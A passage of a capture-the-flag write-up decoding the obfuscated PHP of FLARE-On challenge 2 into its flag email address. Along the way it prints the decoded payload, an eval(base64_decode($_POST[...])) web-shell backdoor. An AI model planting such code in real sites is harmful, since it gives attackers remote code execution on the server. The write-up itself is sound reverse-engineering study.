The first variable ($_) seems to be base64-encoded. Let's try to decode it: 

$ echo "aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9" | base64 -d
if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }

Fourth decoding stage (ascii, hex)

It looks like a mix between ascii (e.g. "97") and hex (e.g. "x4F"). Let's process the strings in python: 

#!/usr/bin/env python

def decode_list(l):
    o = []

    for i in l:
        if i[0] == "x":
            o.append(chr(int('0%s' % i, 0)))
        else:
            o.append(chr(int(i)))

    return ''.join(o)

print "1st string: %s" % decode_list(["97", "49", "x31", "68", "x4F", "x54", "116", "104", "x61", "116", "x44", "79", "x54", "106", "97", "118", "97", "53", "x63", "114", "x61", "x70", "65", "84", "102", "x6C", "x61", "114", "101", "x44", "65", "x53", "72", "111", "x6E", "x44", "x4F", "84", "99", "x6F", "x6D"])

print "2nd string: %s" % decode_list(["97", "49", "49", "68", "x4F", "84", "116", "x68", "97", "x74", "x44", "x4F", "x54", "x6A", "97", "x76", "x61", "x35", "x63", "x72", "97", "x70", "x41", "84", "x66", "x6C", "97", "x72", "x65", "x44", "65", "x53", "72", "111", "110", "68", "79", "84", "99", "x6F", "x6D"])

Here is the output of the script: 

$ python challenge2.py
1st string: a11DOTthatDOTjava5crapATflareDASHonDOTcom
2nd string: a11DOTthatDOTjava5crapATflareDASHonDOTcom

Solution of challenge 2

Replacing DOT, AT and DASH by their corresponding symbols, it provides us with the solution of challenge 2: 

$ echo "a11DOTthatDOTjava5crapATflareDASHonDOTcom" | sed "s/DOT/./g; s/AT/@/; s/DASH/-/"
[email protected]

Comments

Keywords: reverse-engineering challenge flare fireeye






Retrieved from "https://www.aldeid.com/w/index.php?title=The-FLARE-On-Challenge-01/Challenge-2&oldid=36661"